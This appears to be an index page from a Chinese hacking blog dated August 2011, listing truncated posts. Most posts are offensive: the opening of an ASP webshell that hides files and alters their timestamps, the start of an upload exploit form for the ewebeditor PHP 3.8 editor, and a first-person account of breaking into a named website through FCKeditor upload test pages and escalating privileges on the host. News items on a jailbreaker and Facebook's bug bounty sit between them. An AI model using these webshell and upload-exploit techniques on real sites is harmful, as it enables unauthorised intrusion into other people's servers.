乔布斯最恨的黑客揭秘

分类:新闻 | 2011-08-3 | 撸过 476 次
0人扯谈

Nicholas Allegra与他的父母住在Chappaqua,纽约。一眼看去,你可能想不到这位身材高大,

顶着一头蓬松的棕色头发,并戴着近视眼镜的大男孩实际上是一名超级黑客,年仅19岁就已经

能够在越狱界呼风唤雨。因为他有一个在业界受到千万人追捧的网名:Comex。

Allegra就读于布朗大学,目前已经开始进入休假期,并正在寻找合适的实习企业。在此期间,

他一次又一次对计算机领域的安全防护发起冲击:不断从苹果的iPhone源代码内部寻找漏洞。

要知道,这款手机拥有比市面上几乎任何一台电脑都要多的软件限制。而Allegra寻找漏洞的

目的就是为了能够解开iPhone对任何黑客形[......]

继续阅读

隐藏并修改文件的最后修改时间的asp-webshell

分类:安全 | 2011-08-2 | 撸过 710 次
0人扯谈

作者:skyfire[B.H.S.T]

隐藏并修改文件的最后修改时间的asp-webshell

源码:

<%
'隐藏并修改文件的最后修改时间的aspshell
'原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等;FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件
'     通过shell.application可以给文件重新设置一个最后修改时间
'2009/02/24  write by skyfire
response.write "<form method=post>"
response.write "路&nb[......]

继续阅读

ewebeditor PHP 3.8版本上传任意文件0day

分类:安全 | 2011-08-2 | 撸过 1,374 次
0人扯谈

PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似
听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。

EXP如下:

<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multipart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url valu[......]

继续阅读

一次星外虚拟主机的提权

分类:安全 | 2011-08-1 | 撸过 3,502 次
0人扯谈

今天看到个大马多功能防asp木马查杀内部测试版(有后门)看了下.换客网

www.taoyuanbao.com

小小检测了下绝对没啥可利用的。直接旁注几分钟拿下了个shell貌似运气好,随便打开个旁站。

手工输入 fckeditor路径 …。存在…

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

直接上传一句话。aspx的站 … 直接上大马…看了下路径d:\freehost 星外的主机。

在土司找到星外提权“新思路”[......]

继续阅读

MYSQL 数据库专用查询系统

分类:工具 | 2011-08-1 | 撸过 1,321 次
4人扯谈

自动查询某数据库下 所有的表。里字段所有的包含关键字的内容 并输出

下载地址:点击下载MYSQL数据库查询系统

Facebook奖励黑客挖到一个漏洞500刀

分类:新闻 | 2011-08-1 | 撸过 894 次
0人扯谈

大牛们快去试试吧。500美金也不少了。多挖几个啊。俺是没那个份了。只有继续装B了。

行业中Firefox和Chrome浏览器等产品曾经启动过“漏洞奖励”机制,鼓励发现漏洞的

用户和安全研究人员发现并提交漏洞报告,官方会根据情况分别提供数百至数千美元不等金额的奖励。

近日,全球顶级社交网站Facebook高管在接受Cnet采访时表示,公司也会推出

类似的漏洞奖励机制,每名成功提交的获证实漏洞可奖励500美元,无上限封顶。

大家可通过Facebook官方响应中心提交漏洞报告,申请奖励。在安全人员妥善处

理完该漏洞后即可发布给公众查询。类似的做法在行业里屡见不鲜,微软就曾经准备25万美元[......]

继续阅读